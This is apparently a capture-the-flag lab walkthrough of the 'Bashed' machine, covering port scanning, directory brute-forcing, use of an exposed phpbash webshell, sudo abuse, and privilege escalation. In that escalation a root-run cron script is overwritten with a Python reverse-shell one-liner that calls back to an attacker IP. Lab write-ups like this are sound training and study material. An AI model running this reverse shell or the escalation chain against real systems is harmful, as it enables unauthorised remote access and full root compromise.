I ran NMAP.
Nmap 7.25BETA2 scan initiated Sat Feb 10 10:05:35 2018 as: nmap -vv -Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -oA detailed_scan -n 10.10.10.68 Increasing send delay for 10.10.10.68 from 0 to 5 due to 379 out of 1262 dropped probes since last increase. Nmap scan report for 10.10.10.68 Host is up, received user-set (0.26s latency). Scanned at 2018-02-10 10:05:37 EST for 1856s Not shown: 65485 closed ports Reason: 65485 resets PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870 | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site 7515/tcp filtered unknown no-response No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.25BETA2%E=4%D=2/10%OT=80%CT=1%CU=40317%PV=Y%DS=2%DC=T%G=Y%TM=5A OS:7F1181%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(S OS:P=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%II OS:=I%TS=8)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%TS=8)OPS(O1=M508ST11NW7%O2=M508ST1 OS:1NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=71 OS:20%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5 OS:08NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4 OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y% OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Uptime guess: 0.007 days (since Sat Feb 10 10:26:33 2018) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 256/tcp) HOP RTT ADDRESS 1 257.82 ms 10.10.14.1 2 259.11 ms 10.10.10.68 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 10 10:36:33 2018 -- 1 IP address (1 host up) scanned in 1859.43 seconds
I checked port 80 then ran dirbuster.
root@kali:~/Desktop/HTB/bashed# gobuster -u http://10.10.10.68/ \ > -w /usr/share/seclists/Discovery/Web_Content/common.txt \ > -s '200,204,301,302,307,403,500' -e Gobuster v1.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.68/ [+] Threads : 10 [+] Wordlist : /usr/share/seclists/Discovery/Web_Content/common.txt [+] Status codes : 200,204,301,302,307,403,500 [+] Expanded : true ===================================================== http://10.10.10.68/.hta (Status: 403) http://10.10.10.68/.htpasswd (Status: 403) http://10.10.10.68/.htaccess (Status: 403) http://10.10.10.68/css (Status: 301) http://10.10.10.68/dev (Status: 301) http://10.10.10.68/fonts (Status: 301)
Under http://10.10.10.68/dev I found phpbash.php a semi-interactive webshell (https://github.com/Arrexel/phpbash).
I checked the filesystem and found a folder /scripts owned by scriptmanager
www-data@bashed :/# ls -lah total 88K drwxr-xr-x 23 root root 4.0K Dec 4 13:02 . drwxr-xr-x 23 root root 4.0K Dec 4 13:02 .. drwxr-xr-x 2 root root 4.0K Dec 4 11:22 bin drwxr-xr-x 3 root root 4.0K Dec 4 11:17 boot drwxr-xr-x 19 root root 4.2K Apr 28 09:52 dev drwxr-xr-x 89 root root 4.0K Dec 4 17:09 etc drwxr-xr-x 4 root root 4.0K Dec 4 13:53 home lrwxrwxrwx 1 root root 32 Dec 4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic drwxr-xr-x 19 root root 4.0K Dec 4 11:16 lib drwxr-xr-x 2 root root 4.0K Dec 4 11:13 lib64 drwx------ 2 root root 16K Dec 4 11:13 lost+found drwxr-xr-x 4 root root 4.0K Dec 4 11:13 media drwxr-xr-x 2 root root 4.0K Feb 15 2017 mnt drwxr-xr-x 2 root root 4.0K Dec 4 11:18 opt dr-xr-xr-x 117 root root 0 Apr 28 09:52 proc drwx------ 3 root root 4.0K Dec 4 13:03 root drwxr-xr-x 18 root root 500 Apr 28 09:53 run drwxr-xr-x 2 root root 4.0K Dec 4 11:18 sbin drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 18:06 scripts drwxr-xr-x 2 root root 4.0K Feb 15 2017 srv dr-xr-xr-x 13 root root 0 Apr 28 09:53 sys drwxrwxrwt 10 root root 4.0K Apr 28 09:53 tmp drwxr-xr-x 10 root root 4.0K Dec 4 11:13 usr drwxr-xr-x 12 root root 4.0K Dec 4 11:20 var lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
I ran sudo -l and found out that I can run command as user scriptmanager without a password.
sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
Using sudo -u I was able to change the permission of the /scripts directory.
I found two files under /scripts directory test.py and test.txt.
www-data@bashed:/scripts# ls -l total 8 -rw-r--r-- 1 scriptmanager scriptmanager 58 Feb 10 20:09 test.py -rw-r--r-- 1 root root 12 Feb 10 20:43 test.txt
test.py
f = open("test.txt", "w") f.write("testing 123!") f.close
test.txt
testing 123!
I noticed in the timestamp of test.txt it updates in every ≤ 5 minutes and root owns it.
I changed the permission of the test.py so I can modify the code to python reverse shell.
sudo -u scriptmanager chmod 777 /scripts/test.py echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.15',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > test.py
After waiting for a few minutes I got root.